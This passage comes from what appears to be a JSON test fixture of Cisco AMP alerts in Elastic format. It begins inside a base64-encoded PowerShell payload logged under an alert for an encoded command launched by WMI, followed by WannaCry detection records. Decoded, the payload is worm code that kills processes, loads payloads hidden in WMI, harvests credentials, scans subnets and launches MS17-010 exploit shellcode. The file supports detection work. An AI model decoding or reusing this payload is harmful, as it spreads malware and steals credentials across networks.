GEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==", + "parent_app": "WmiPrvSE.exe", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "parent_pid": 2236, + "parent_puid": 132461352663910600, + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "puid": 132465072105597400, + "ts": 1602033881727175700, + "user": "user@testdomain.com", + "user_sid": "010100000000000512000000" + } + } + ], + "cisco.amp.bp_data.details.matched_activity.limited": false, + "cisco.amp.bp_data.details.matched_activity.matched": 1, + "cisco.amp.bp_data.details.schema": "endpoint", + "cisco.amp.bp_data.details.schema_epoch": 2, + "cisco.amp.bp_data.details.sig_id": 20190517123456, + "cisco.amp.bp_data.details.sig_rev": 5, + "cisco.amp.bp_data.detection": "apde:20190517123456", + "cisco.amp.bp_data.end_ts": 1610640884, + "cisco.amp.bp_data.engine": "apde", + "cisco.amp.bp_data.id": "d2616Ab846", + "cisco.amp.bp_data.name": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.bp_data.normalized.name": "wmiprvse launched encoded powershell command", + "cisco.amp.bp_data.normalized.observables.file.name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "cisco.amp.bp_data.normalized.observables.file.path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ], + "cisco.amp.bp_data.observables.file": [ + { + "md5": "a575a7610e5f003cc36df39e07c4ba7d", + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1 + }, + { + "md5": "d683c112190f4b4c6d477d693ee88e35", + "name": "WmiPrvSE.exe", + "path": "C:\\Windows\\System32\\wbem", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1 + } + ], + "cisco.amp.bp_data.remediated": false, + "cisco.amp.bp_data.severity": "medium", + "cisco.amp.bp_data.silent": false, + "cisco.amp.bp_data.start_ts": 1610640884, + "cisco.amp.bp_data.tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.bp_data.ts": 1610640884, + "cisco.amp.bp_data.type": "activity", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.event_type_id": 553648222, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detection", + "event.dataset": "cisco.amp", + "event.id": 6880683125978957000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 38130, + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 68391, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 74476, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 75732, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 